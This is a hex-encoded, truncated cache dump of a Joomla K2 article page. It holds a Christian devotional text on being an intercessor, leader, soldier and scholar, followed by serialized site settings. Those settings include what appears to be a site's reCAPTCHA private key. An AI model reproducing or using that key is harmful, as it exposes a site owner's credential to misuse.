a0796f757220c2a0726573706f6e736962696c69747920c2a020746f20c2a0696e7465726365646520c2a0666f7220796f757220c2a066656c6c6f772043687269737469616e732c20c2a0206368757263682c20c2a066616d696c792c20c2a0667269656e64732c20c2a020746f776e2c20c2a073746174652c20c2a06e6174696f6e2c20c2a020616e64207768656e20476f64206c656164732c20c2a070656f706c6520796f7520646f6e277420c2a06576656e206b6e6f772e204120676f6f6420696e746572636573736f7220c2a06e6565647320686967682073706972697475616c20c2a07374616d696e6120c2a0616e6420746865206f6e6c792077617920746f206765742074686174207374616d696e6120c2a069732062792070726179696e6720c2a06e6f772e20546865206d6f726520796f7520656e6761676520696e20c2a0696e74657263657373696f6e2c20c2a020746865207374726f6e67657220796f75722027696e746572636573736f727920c2a06d7573636c65732720646576656c6f702e20446f6e277420737061726520796f757273656c662e2054616b6520696e74657263657373696f6e20c2a020736572696f75732c20c2a0796f75276c6c20c2a06e65766572206b6e6f77207768656e2061206c6f76656420c2a06f6e65206e6565647320796f75722070726179657220c2a0757267656e746c792e20c2a0416e6420796f75207265616c6c792063616e6e6f742067697665207768617420796f7520646f6e277420686176652e3c2f703e0d0a3c703e3c7374726f6e673e342e20596f7541726520546f2042652041204c65616465722e3c2f7374726f6e673e3c2f703e0d0a3c703e4e6f206d6174746572207768617420796f757220706f736974696f6e20c2a0617420636875726368206f7220617420796f757220706c61636520c2a06f6620776f726b2069732c20476f64206861732063616c6c656420796f7520746f206c65616420c2a0696e206120636170616369747920736f6d65776865726520c2a0616e6420736f6d6574696d6520c2a0746f2061206465677265652e20596f75206d7573742072656d656d62657220c2a07468617420746865726520697320c2a06120646966666572656e636520c2a06265747765656e2074686f73652077686f206c65616420616e642074686f73652077686f2061726520696e206c6561646572736869702e20c2a054686f73652077686f2061726520696e206c656164657273686970206861766520746865207469746c6520627574206d6179206e6f74206e65636573736172696c7920c2a0626520746865206f6e6573206c656164696e6720c2a065766572796f6e652c206275742074686f73652077686f206c656164206172652074686f736520c2a077686f20686176652074616b656e20746865697220646576656c6f706d656e7420c2a02070726f6365737320736572696f757320616e64206e6f772068617665207468652063617061636974792c2073706972697475616c20c2a0776973646f6d2c20c2a073706972697475616c20c2a0646570746820616e642073656e736974697669747920746f206c656164206f74686572732e20496e20657665727920736974756174696f6e2c20c2a06974277320746865206d616e2077686f206b6e6f7773207768617420746f20646f20746861742077696c6c20656e64207570206c656164696e672065766572796f6e6520656c73652e20486f7720646f20796f75207072657061726520c2a0796f757273656c6620666f72206c6561646572736869703f20c2a053696d706c6520616e64207374726169676874666f72776172643a2074616b6520796f75722063687572636820c2a06d656d6265727368697020c2a0736572696f75732e20c2a0446f6e27742073687920617761792066726f6d20616e792061737369676e6d656e7420c2a0676976656e20746f20796f7520627920796f757220706173746f722c20c2a0696e737465616420c2a0656d627261636520c2a069742077686f6c65686561727465646c792e20c2a02045666665637469766520666f6c6c6f7765727368697020c2a0206f6620746865206c65616465727368697020c2a073747275637475726520c2a0696e20796f7572206368757263682069676e6974657320c2a07468652066697265206f666c65616465727368697020646f726d616e7420696e20796f75722068656172742e3c2f703e0d0a3c703e3c7374726f6e673e352e20596f752041726520546f204265204120536f6c646965722e20457068657369616e7320c2a0363a31302d31383c2f7374726f6e673e3c2f703e0d0a3c703e576520617265206174207761722e2043687269737469616e69747920c2a0697320616e20616374697665207761726661726520c2a0616761696e73742074686520646576696c20616e642068697320636f686f727473206e6f742061202253756e6461792046617368696f6e20436f6e746573743a2720c2a054686520646576696c20c2a0686174657320796f752c20686520686174657320476f6420616e642077616e747320c2a0746f207275696e20c2a0796f7572206c69666520616e642074686520776f727374207468696e6720c2a0796f752063616e20646f20c2a06173206120736f6c6469657220c2a0697320746f20617070726f616368206120626174746c656669656c6420c2a0756e617761726520616e6420756e707265706172656420666f722074686520776172206f6e2067726f756e642e20c2a05361646c7920656e6f7567682c20c2a07468697320c2a0697320c2a0686f77206d6f7374206f662043687269737469616e7320c2a0206172652e204c6574207573206c6f6f6b20c2a061742077686174205061756c20c2a07361797320696e20457068657369616e7320c2a020362061626f757420776172666172652e3c2f703e0d0a3c703e546865206b657920706f696e747320c2a066726f6d207468652061626f766520736372697074757265206172653a3c2f703e0d0a3c6f6c3e0d0a3c6c693e596f75206e65656420746f20626520707265706172656420746f207374616e6420616761696e7374207468652077696c6573206f662074686520646576696c2e3c2f6c693e0d0a3c6c693e57652077726573746c6520616761696e7374207072696e636970616c697469657320616e6420706f77657273206e6f742068756d616e206265696e67732e3c2f6c693e0d0a3c6c693e546865726520c2a0776f756c6420c2a0626520616e20226576696c2064617922207768656e206974207365656d73206c696b6520616c6c2068656c6c206a7573742062726f6b65206c6f6f736520c2a0696e20796f757220646972656374696f6e20c2a0616e6420796f75206d7573742062652061626c6520c2a0746f20776974687374616e6420c2a020696e20c2a074686174206461792e20546f20636f6e647563742073706972697475616c20c2a020776172666172652070726f7065726c792c20c2a0796f75206d7573742061726d20796f757273656c6620c2a0776974683c2f6c693e0d0a3c6c693e74686520c2a0666f6c6c6f77696e6720c2a07468696e67733b20c2a074727574682c20c2a07269676874656f75736e6573732c20c2a074686520676f7370656c20c2a06f662070656163652c2046414954482c20c2a073616c766174696f6e20c2a0616e6420476f64277320776f72642e20416c6c20c2a07468657365207468696e677320776f726b2068616e6420696e2068616e6420746f2068656c7020796f75206566666563746976656c7920636f6e647563742073706972697475616c20c2a0776172666172652e3c2f6c693e0d0a3c6c693e4c6173746c792c20796f75206d7573742074616b6520796f757220707261796572206c696665207665727920736572696f75732e20c2a020446576656c6f7020c2a0207468653c2f6c693e0d0a3c6c693e7374616d696e6120746f2062652061626c6520746f207072617920666f722061206c6f6e672074696d652062792070726179696e6720666f72206c6f6e6720706572696f6473206f662074696d652e3c2f6c693e0d0a3c2f6f6c3e0d0a3c703e3c7374726f6e673e362e20596f752041726520546f2042652041205363686f6c61723c2f7374726f6e673e3c2f703e0d0a3c703e596f75206d757374206163746976656c79207365656b20646976696e6520c2a06b6e6f776c656467652c20776973646f6d2c20616e6420756e6465727374616e64696e672e20c2a0546865206d6f7265207363726970747572657320c2a0796f75206b6e6f7720616e642063616e207573652c20746865206d6f72652065666665637469766520796f757220666169746820c2a063616e20626520616e6420746865206c657373206c696b656c7920c2a074686520646576696c20697320746f206c696520746f20796f7520636f6e6365726e696e6720c2a020736f6d657468696e6720c2a0476f642068616420616c7265616479207361696420696e2074686520736372697074757265732e20c2a0546865204269626c65207361797320696e2050726f76657262732032333a323320224275797468652074727574682c20616e642073656c6c6974206e6f743b20616c736f20776973646f6d2c20616e6420696e737472756374696f6e2c20616e6420756e6465727374616e64696e672e223c2f703e0d0a3c703e596f75206d757374207370656e6420796f7572206d6f6e6579206e6f74206f6e6c7920c2a06f6e20636c6f746865732c20666f6f642c206574632e20627574206f6e207468696e677320746861742077696c6c20656469667920616e64206e6f757269736820c2a020796f75722073706972697420737563682061732043687269737469616e20c2a074617065732c20626f6f6b732c206d757369632e20416c736f20796f75206d757374206163746976656c79207365656b2074727574682c20776973646f6d2c20646976696e6520696e737472756374696f6e20c2a0616e6420756e6465727374616e64696e672e204f6e652077617920796f752063616e20646f20746869732c2074686174206d616e792043687269737469616e7320c2a068617665206f7665726c6f6f6b656420666f722061206c6f6e672074696d652c20697320c2a074686520617274206f662074616b696e67206e6f74657320696e204368757263682e20c2a041206c6f74206f662070656f706c6520c2a074616b65206e6f74657320627574206c696b65206261642073747564656e74732c2074686579206e657665722072656164207468656d2e204d616b65206120706c616e20c2a0746f20676f207468726f75676820616c6c20796f7572207365726d6f6e206e6f74657320616e64207265667265736820796f7572206d696e6420616e642073706972697420776974682074686520747275746820746861742061626f756e647320696e2074686f7365206e6f7465732e3c2f703e0d0a3c703ec2a03c2f703e0d0a3c703ec2a03c2f703e0d0a3c703ec2a03c2f703e0d0a3c703ec2a03c2f703e223b733a353a226361746964223b733a313a2232223b733a31303a22637265617465645f6279223b733a333a22313936223b733a31363a22637265617465645f62795f616c696173223b733a303a22223b733a383a226d6f646966696564223b733a31393a22323031372d30322d31322031303a31383a3530223b733a31313a226d6f6469666965645f6279223b733a333a22313936223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3135323a7b733a31303a22656e61626c655f637373223b733a313a2230223b733a31343a226a517565727948616e646c696e67223b733a313a2230223b733a32313a226261636b656e644a517565727948616e646c696e67223b733a353a226c6f63616c223b733a383a22757365724e616d65223b733a313a2230223b733a393a2275736572496d616765223b733a313a2230223b733a31353a22757365724465736372697074696f6e223b733a313a2230223b733a373a227573657255524c223b733a313a2231223b733a393a2275736572456d61696c223b733a313a2230223b733a31323a2275736572466565644c696e6b223b733a313a2230223b733a31323a22757365724665656449636f6e223b733a313a2231223b733a31333a22757365724974656d436f756e74223b733a323a223130223b733a31333a22757365724974656d5469746c65223b733a313a2231223b733a31393a22757365724974656d5469746c654c696e6b6564223b733a313a2231223b733a31393a22757365724974656d4461746543726561746564223b733a313a2231223b733a31333a22757365724974656d496d616765223b733a313a2231223b733a31373a22757365724974656d496e74726f54657874223b733a313a2231223b733a31363a22757365724974656d43617465676f7279223b733a313a2230223b733a31323a22757365724974656d54616773223b733a313a2231223b733a32323a22757365724974656d436f6d6d656e7473416e63686f72223b733a313a2231223b733a31363a22757365724974656d526561644d6f7265223b733a313a2231223b733a31373a22757365724974656d4b32506c7567696e73223b733a313a2231223b733a31323a227461674974656d436f756e74223b733a323a223130223b733a31323a227461674974656d5469746c65223b733a313a2231223b733a31383a227461674974656d5469746c654c696e6b6564223b733a313a2231223b733a31383a227461674974656d4461746543726561746564223b733a313a2231223b733a31323a227461674974656d496d616765223b733a313a2231223b733a31363a227461674974656d496e74726f54657874223b733a313a2231223b733a31353a227461674974656d43617465676f7279223b733a313a2231223b733a31353a227461674974656d526561644d6f7265223b733a313a2231223b733a31383a227461674974656d45787472614669656c6473223b733a313a2230223b733a31313a227461674f72646572696e67223b733a353a22616c706861223b733a31313a22746167466565644c696e6b223b733a313a2231223b733a31313a227461674665656449636f6e223b733a313a2231223b733a31363a2267656e657269634974656d436f756e74223b733a323a223130223b733a31363a2267656e657269634974656d5469746c65223b733a313a2231223b733a32323a2267656e657269634974656d5469746c654c696e6b6564223b733a313a2231223b733a32323a2267656e657269634974656d4461746543726561746564223b733a313a2231223b733a31363a2267656e657269634974656d496d616765223b733a313a2231223b733a32303a2267656e657269634974656d496e74726f54657874223b733a313a2231223b733a31393a2267656e657269634974656d43617465676f7279223b733a313a2231223b733a31393a2267656e657269634974656d526561644d6f7265223b733a313a2231223b733a32323a2267656e657269634974656d45787472614669656c6473223b733a313a2230223b733a31353a2267656e65726963466565644c696e6b223b733a313a2231223b733a31353a2267656e657269634665656449636f6e223b733a313a2231223b733a393a22666565644c696d6974223b733a323a223130223b733a31333a22666565644974656d496d616765223b733a313a2230223b733a31313a2266656564496d6753697a65223b733a313a2253223b733a31373a22666565644974656d496e74726f54657874223b733a313a2231223b733a31373a226665656454657874576f72644c696d6974223b733a303a22223b733a31363a22666565644974656d46756c6c54657874223b733a313a2231223b733a31323a22666565644974656d54616773223b733a313a2230223b733a31333a22666565644974656d566964656f223b733a313a2230223b733a31353a22666565644974656d47616c6c657279223b733a313a2230223b733a31393a22666565644974656d4174746163686d656e7473223b733a313a2230223b733a31343a2266656564426f677573456d61696c223b733a303a22223b733a31363a22696e74726f54657874436c65616e7570223b733a313a2230223b733a32373a22696e74726f54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32333a22696e74726f54657874436c65616e757054616741747472223b733a303a22223b733a31353a2266756c6c54657874436c65616e7570223b733a313a2230223b733a32363a2266756c6c54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32323a2266756c6c54657874436c65616e757054616741747472223b733a303a22223b733a31323a2278737346696c746572696e67223b733a313a2230223b733a31343a226c696e6b506f7075705769647468223b733a333a22393030223b733a31353a226c696e6b506f707570486569676874223b733a333a22363030223b733a31333a22696d616765735175616c697479223b733a333a22313030223b733a31313a226974656d496d6167655853223b733a323a223634223b733a31303a226974656d496d61676553223b733a333a22323030223b733a31303a226974656d496d6167654d223b733a333a22383536223b733a31303a226974656d496d6167654c223b733a333a22383536223b733a31313a226974656d496d616765584c223b733a333a22383536223b733a31363a226974656d496d61676547656e65726963223b733a333a22383536223b733a31333a22636174496d6167655769647468223b733a333a22313030223b733a31353a22636174496d61676544656661756c74223b733a313a2230223b733a31343a2275736572496d6167655769647468223b733a323a223634223b733a31363a2275736572496d61676544656661756c74223b733a313a2231223b733a31373a22636f6d6d656e746572496d675769647468223b733a323a223438223b733a31373a226f6e6c696e65496d616765456469746f72223b733a393a2273756d6f7061696e74223b733a31343a22696d61676554696d657374616d70223b733a313a2230223b733a31363a22696d6167654d656d6f72794c696d6974223b733a303a22223b733a31363a22736f6369616c427574746f6e436f6465223b733a303a22223b733a31353a2274776974746572557365726e616d65223b733a303a22223b733a31363a2266616365626f6f6b4d65746174616773223b733a313a2231223b733a31333a2266616365626f6f6b496d616765223b733a363a2258536d616c6c223b733a383a22636f6d6d656e7473223b733a313a2232223b733a31363a22636f6d6d656e74734f72646572696e67223b733a343a2244455343223b733a31333a22636f6d6d656e74734c696d6974223b733a323a223130223b733a32303a22636f6d6d656e7473466f726d506f736974696f6e223b733a353a2262656c6f77223b733a31383a22636f6d6d656e74735075626c697368696e67223b733a313a2231223b733a31373a22636f6d6d656e74735265706f7274696e67223b733a313a2232223b733a32333a22636f6d6d656e74735265706f7274526563697069656e74223b733a303a22223b733a32343a22696e6c696e65436f6d6d656e74734d6f6465726174696f6e223b733a313a2230223b733a383a226772617661746172223b733a313a2231223b733a383a22616e74697370616d223b733a393a22726563617074636861223b733a32323a22726563617074636861466f7252656769737465726564223b733a313a2231223b733a32303a22616b69736d6574466f7252656769737465726564223b733a313a2230223b733a31373a22636f6d6d656e7473466f726d4e6f746573223b733a313a2231223b733a32313a22636f6d6d656e7473466f726d4e6f74657354657874223b733a303a22223b733a31353a2266726f6e74656e6445646974696e67223b733a313a2231223b733a31323a2273686f77496d616765546162223b733a313a2231223b733a31393a2273686f77496d61676547616c6c657279546162223b733a313a2231223b733a31323a2273686f77566964656f546162223b733a313a2231223b733a31383a2273686f7745787472614669656c6473546162223b733a313a2231223b733a31383a2273686f774174746163686d656e7473546162223b733a313a2231223b733a31333a2273686f774b32506c7567696e73223b733a313a2231223b733a32323a2273696465426172446973706c617946726f6e74656e64223b733a313a2230223b733a31323a226d65726765456469746f7273223b733a313a2231223b733a31343a2273696465426172446973706c6179223b733a313a2231223b733a31373a226174746163686d656e7473466f6c646572223b733a303a22223b733a31363a2268696465496d706f7274427574746f6e223b733a313a2230223b733a31323a22676f6f676c65536561726368223b733a313a2230223b733a32313a22676f6f676c65536561726368436f6e7461696e6572223b733a31313a226b32436f6e7461696e6572223b733a31333a224b325573657250726f66696c65223b733a313a2230223b733a31313a224b325573657247726f7570223b733a313a2231223b733a383a227265646972656374223b733a333a22313038223b733a31313a2261646d696e536561726368223b733a363a2273696d706c65223b733a31323a22636f6f6b6965446f6d61696e223b733a303a22223b733a31363a2267617468657253746174697374696373223b733a313a2231223b733a31333a2274616767696e6753797374656d223b733a313a2231223b733a383a226c6f636b54616773223b733a313a2230223b733a31333a2273686f7754616746696c746572223b733a313a2230223b733a393a226b325461674e6f726d223b733a313a2230223b733a31333a226b325461674e6f726d43617365223b733a353a226c6f776572223b733a33313a226b325461674e6f726d4164646974696f6e616c5265706c6163656d656e7473223b733a303a22223b733a32303a227265636170746368615f7075626c69635f6b6579223b733a34303a22364c667869686b5541414141414d6354446653334b74436877475658796a5a69634a36665755514d223b733a32313a227265636170746368615f707269766174655f6b6579223b733a37323a22364c667869686b554141414141476a736f4f3955375f61324c693558364a5250484a6b73556d4555205374657020313a20636c69656e742d7369646520696e746567726174696f6e223b733a31353a227265636170746368615f7468656d65223b733a353a22636c65616e223b733a31313a227265636170746368615632223b733a313a2231223b733a32333a227265636170746368614f6e526567697374726174696f6e223b733a313a2231223b733a31333a22616b69736d65744170694b6579223b733a303a22223b733a31333a2273746f70466f72756d5370616d223b733a313a2230223b733a31393a2273746f70466f72756d5370616d4170694b6579223b733a303a22223b733a31383a2270726f66696c6550616765446973706c6179223b733a313a2230223b733a32313a2273686f774974656d73436f756e74657241646d696e223b733a313a2231223b733a31373a2273686f774368696c644361744974656d73223b733a313a2231223b733a32323a2264697361626c65436f6d706163744f72646572696e67223b733a313a2230223b733a31333a226d657461446573634c696d6974223b733a333a22313530223b733a32323a22656e666f7263655345465265706c6163656d656e7473223b733a313a2230223b733a31353a225345465265706c6163656d656e7473223b733a323736383a22c3807c412c20c3817c412c20c3827c412c20c3837c412c20c3847c412c20c3857c412c20c3a07c612c20c3a17c612c20c3a27c612c20c3a37c612c20c3a47c612c20c3a57c612c20c4807c412c20c4817c612c20c4827c412c20c4837c612c20c4847c412c20c4857c612c20c3877c432c20c3a77c632c20c4867c432c20c4877c632c20c4887c432c20c4897c632c20c48a7c432c20c48b7c632c20c48c7c432c20c48d7c632c20c3907c442c20c3b07c642c20c48e7c442c20c48f7c642c20c4907c442c20c4917c642c20c3887c452c20c3897c452c20c38a7c452c20c38b7c452c20c3a87c652c20c3a97c652c20c3aa7c652c20c3ab7c652c20c4927c452c20c4937c652c20c4947c452c20c4957c652c20c4967c452c20c4977c652c20c4987c452c20c4997c652c20c49a7c452c20c49b7c652c20c49c7c472c20c49d7c672c20c49e7c472c20c49f7c672c20c4a07c472c20c4a17c672c20c4a27c472c20c4a37c672c20c4a47c482c20c4a57c682c20c4a67c482c20c4a77c682c20c38c7c492c20c38d7c492c20c38e7c492c20c38f7c492c20c3ac7c692c20c3ad7c692c20c3ae7c692c20c3af7c692c20c4a87c492c20c4a97c692c20c4aa7c492c20c4ab7c692c20c4ac7c492c20c4ad7c692c20c4ae7c492c20c4af7c692c20c4b07c492c20c4b17c692c20c4b47c4a2c20c4b57c6a2c20c4b67c4b2c20c4b77c6b2c20c4b87c6b2c20c4b97c4c2c20c4ba7c6c2c20c4bb7c4c2c20c4bc7c6c2c20c4bd7c4c2c20c4be7c6c2c20c4bf7c4c2c20c5807c6c2c20c5817c4c2c20c5827c6c2c20c3917c4e2c20c3b17c6e2c20c5837c4e2c20c5847c6e2c20c5857c4e2c20c5867c6e2c20c5877c4e2c20c5887c6e2c20c5897c6e2c20c58a7c4e2c20c58b7c6e2c20c3927c4f2c20c3937c4f2c20c3947c4f2c20c3957c4f2c20c3967c4f2c20c3987c4f2c20c3b27c6f2c20c3b37c6f2c20c3b47c6f2c20c3b57c6f2c20c3b67c6f2c20c3b87c6f2c20c58c7c4f2c20c58d7c6f2c20c58e7c4f2c20c58f7c6f2c20c5907c4f2c20c5917c6f2c20c5947c522c20c5957c722c20c5967c522c20c5977c722c20c5987c522c20c5997c722c20c59a7c532c20c59b7c732c20c59c7c532c20c59d7c732c20c59e7c532c20c59f7c732c20c5a07c532c20c5a17c732c20c5bf7c732c20c5a27c542c20c5a37c742c20c5a47c542c20c5a57c742c20c5a67c542c20c5a77c742c20c3997c552c20c39a7c552c20c39b7c552c20c39c7c552c20c3b97c752c20c3ba7c752c20c3bb7c752c20c3bc7c752c20c5a87c552c20c5a97c752c20c5aa7c552c20c5ab7c752c20c5ac7c552c20c5ad7c752c20c5ae7c552c20c5af7c752c20c5b07c552c20c5b17c752c20c5b27c552c20c5b37c752c20c5b47c572c20c5b57c772c20c39d7c592c20c3bd7c792c20c3bf7c792c20c5b67c592c20c5b77c792c20c5b87c592c20c5b97c5a2c20c5ba7c7a2c20c5bb7c5a2c20c5bc7c7a2c20c5bd7c5a2c20c5be7c7a2c20ceb17c612c20ceb27c622c20ceb37c672c20ceb47c642c20ceb57c652c20ceb67c7a2c20ceb77c682c20ceb87c74682c20ceb97c692c20ceba7c6b2c20cebb7c6c2c20cebc7c6d2c20cebd7c6e2c20cebe7c782c20cebf7c6f2c20cf807c702c20cf817c722c20cf837c732c20cf847c742c20cf857c792c20cf867c662c20cf877c63682c20cf887c70732c20cf897c772c20ce917c412c20ce927c422c20ce937c472c20ce947c442c20ce957c452c20ce967c5a2c20ce977c482c20ce987c54682c20ce997c492c20ce9a7c4b2c20ce9b7c4c2c20ce9c7c4d2c20ce9e7c582c20ce9f7c4f2c20cea07c502c20cea17c522c20cea37c532c20cea47c542c20cea57c592c20cea67c462c20cea77c43682c20cea87c50732c20cea97c572c20ceac7c612c20cead7c652c20ceae7c682c20ceaf7c692c20cf8c7c6f2c20cf8d7c792c20cf8e7c772c20ce867c412c20ce887c452c20ce897c482c20ce8a7c492c20ce8c7c4f2c20ce8e7c592c20ce8f7c572c20cf8a7c692c20ce907c692c20cf8b7c792c20cf827c732c20d0907c412c20d3907c412c20d3927c412c20d3987c452c20d39a7c452c20d3947c452c20d0917c422c20d0927c562c20d0937c472c20d2907c472c20d0837c472c20d2927c472c20d3b67c472c20797c592c20d0947c442c20d0957c452c20d0807c452c20d0817c594f2c20d3967c452c20d2bc7c452c20d2be7c452c20d0847c59452c20d0967c5a482c20d3817c445a482c20d2967c5a482c20d39c7c445a482c20d0977c5a2c20d2987c5a2c20d39e7c445a2c20d3a07c445a2c20d0857c445a2c20d0987c492c20d08d7c492c20d3a47c492c20d3a27c492c20d0867c492c20d0877c4a492c20d3807c492c20d0997c592c20d28a7c592c20d0887c4a2c20d09a7c4b2c20d29a7c512c20d29e7c512c20d2a07c4b2c20d3837c512c20d29c7c4b2c20d09b7c4c2c20d3857c4c2c20d0897c4c2c20d09c7c4d2c20d38d7c4d2c20d09d7c4e2c20d3897c4e2c20d2a27c4e2c20d3877c4e2c20d2a47c4e2c20d08a7c4e2c20d09e7c4f2c20d3a67c4f2c20d3a87c4f2c20d3aa7c4f2c20d2a87c4f2c20d09f7c502c20d2a67c50462c20d0a07c502c20d28e7c502c20d0a17c532c20d2aa7c532c20d0a27c542c20d2ac7c54482c20d08b7c542c20d08c7c4b2c20d0a37c552c20d08e7c552c20d3b27c552c20d3b07c552c20d3ae7c552c20d2ae7c552c20d2b07c552c20d0a47c462c20d0a57c482c20d2b27c482c20d2ba7c482c20d0a67c54532c20d2b47c54532c20d0a77c43482c20d3b47c43482c20d2b67c43482c20d38b7c43482c20d2b87c43482c20d08f7c445a2c20d0a87c53482c20d0a97c5348542c20d0aa7c412c20d0ab7c592c20d3b87c592c20d0ac7c592c20d28c7c592c20d0ad7c452c20d3ac7c452c20d0ae7c59552c20d0af7c59412c20d0b07c612c20d3917c612c20d3937c612c20d3997c652c20d39b7c652c20d3957c652c20d0b17c622c20d0b27c762c20d0b37c672c20d2917c672c20d1937c672c20d2937c672c20d3b77c672c20797c792c20d0b47c642c20d0b57c652c20d1907c652c20d1917c796f2c20d3977c652c20d2bd7c652c20d2bf7c652c20d1947c79652c20d0b67c7a682c20d3827c647a682c20d2977c7a682c20d39d7c647a682c20d0b77c7a2c20d2997c7a2c20d39f7c647a2c20d3a17c647a2c20d1957c647a2c20d0b87c692c20d19d7c692c20d3a57c692c20d3a37c692c20d1967c692c20d1977c6a692c20d3807c692c20d0b97c792c20d28b7c792c20d1987c6a2c20d0ba7c6b2c20d29b7c712c20d29f7c712c20d2a17c6b2c20d3847c712c20d29d7c6b2c20d0bb7c6c2c20d3867c6c2c20d1997c6c2c20d0bc7c6d2c20d38e7c6d2c20d0bd7c6e2c20d38a7c6e2c20d2a37c6e2c20d3887c6e2c20d2a57c6e2c20d19a7c6e2c20d0be7c6f2c20d3a77c6f2c20d3a97c6f2c20d3ab7c6f2c20d2a97c6f2c20d0bf7c702c20d2a77c70662c20d1807c702c20d28f7c702c20d1817c732c20d2ab7c732c20d1827c742c20d2ad7c74682c20d19b7c742c20d19c7c6b2c20d1837c752c20d19e7c752c20d3b37c752c20d3b17c752c20d3af7c752c20d2af7c752c20d2b17c752c20d1847c662c20d1857c682c20d2b37c682c20d2bb7c682c20d1867c74732c20d2b57c74732c20d1877c63682c20d3b57c63682c20d2b77c63682c20d38c7c63682c20d2b97c63682c20d19f7c647a2c20d1887c73682c20d1897c7368742c20d18a7c612c20d18b7c792c20d3b97c792c20d18c7c792c20d28d7c792c20d18d7c652c20d3ad7c652c20d18e7c79752c20d18f7c7961223b733a353a226b32536566223b733a313a2230223b733a31333a226b325365664c6162656c436174223b733a373a22636f6e74656e74223b733a31333a226b325365664c6162656c546167223b733a333a22746167223b733a31343a226b325365664c6162656c55736572223b733a363a22617574686f72223b733a31363a226b325365664c6162656c536561726368223b733a363a22736561726368223b733a31343a226b325365664c6162656c44617465223b733a343a2264617465223b733a31343a226b325365664c6162656c4974656d223b733a313a2230223b733a32363a226b325365664c6162656c4974656d437573746f6d507265666978223b733a303a22223b733a31373a226b32536566496e736572744974656d4964223b733a313a2231223b733a32343a226b325365664974656d49645469746c65416c696173536570223b733a343a2264617368223b733a32323a226b325365665573654974656d5469746c65416c696173223b733a313a2231223b733a31363a226b32536566496e736572744361744964223b733a313a2231223b733a32333a226b3253656643617449645469746c65416c696173536570223b733a343a2264617368223b733a32313a226b325365665573654361745469746c65416c696173223b733a313a2231223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a373a226d6574616b6579223b733a303a22223b733a383a226d65746164657363223b733a303a22223b733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a323a7b733a363a22726f626f7473223b733a303a22223b733a363a22617574686f72223b733a303a22223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226f72646572696e67223b733a323a223130223b733a353a227472617368223b733a313a2230223b733a393a226361745f7472617368223b733a313a2230223b733a383a2263617465676f7279223b733a353a224661697468223b733a393a226361745f7374617465223b733a313a2231223b733a31303a226361745f616363657373223b733a313a2231223b733a31393a2265787472615f6669656c64735f736561726368223b733a303a22223b733a31323a2265787472615f6669656c6473223b733a323a225b5d223b733a343a22736c7567223b733a31303a2232323a636f7272656374223b733a373a22636174736c7567223b733a373a22323a6661697468223b733a363a22617574686f72223b733a393a224c6966656f61736973223b733a363a226c61796f7574223b733a343a226974656d223b733a343a2270617468223b733a32383a22636f6d706f6e656e742f6b322f6974656d2f32322d636f7272656374223b733a31303a226d657461617574686f72223b4e3b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a393a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b693a333b733a373a226d6574616b6579223b693a343b733a383a226d65746164657363223b693a353b733a31303a226d657461617574686f72223b693a363b733a363a22617574686f72223b693a373b733a31363a22637265617465645f62795f616c696173223b693a383b733a31393a2265787472615f6669656c64735f736561726368223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a353a7b733a343a2254797065223b613a313a7b733a373a224b32204974656d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a373a224b32204974656d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a363a22417574686f72223b613a313a7b733a393a224c6966656f61736973223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a393a224c6966656f61736973223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31313a224b322043617465676f7279223b613a313a7b733a353a224661697468223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a353a224661697468223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a224c616e6775616765223b613a313a7b733a313a222a223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a313a222a223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31323a224578747261206669656c6473223b613a313a7b733a323a225b5d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a323a225b5d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a33393a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d3232223b733a353a22726f757465223b733a34373a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d32323a636f7272656374223b733a353a227469746c65223b733a37363a22486f7720546f204265206120436f72726563742043687269737469616e20696e206120576f726c64206f6620506f6c6c7574696f6e20616e6420204d69787475726573202850617274203229223b733a31313a226465736372697074696f6e223b733a3337393a222054484520524f4c4553204120545255452043485249535449414e204d55535420504c41593a20526f6d616e732031323a312d32204c617374207765656b2c2077652073747564696564206f6e207468652070726f626c656d73207468617420706c6167756520746f64617927732043687269737469616e7320616e6420796f75722064757469657320696e207468697320776f726c64206f6620706f6c6c7574696f6e20616e64206d697874757265732e20546865726520697320616e20757267656e74206e65656420666f722043687269737469616e7320746f2077616b6520757020746f20746865697220726573706f6e736962696c697469657320616e642073746f70206372656174696e6720636f6e667573696f6e732e205468657265206e6f206c6f6e67657220657869737473206120636c6561722064656d6172636174696f6e206265747765656e206d6f73742043687269737469616e7320616e64207468652072657374206f662074686520776f726c642e20223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b693a313b733a363a22616363657373223b733a3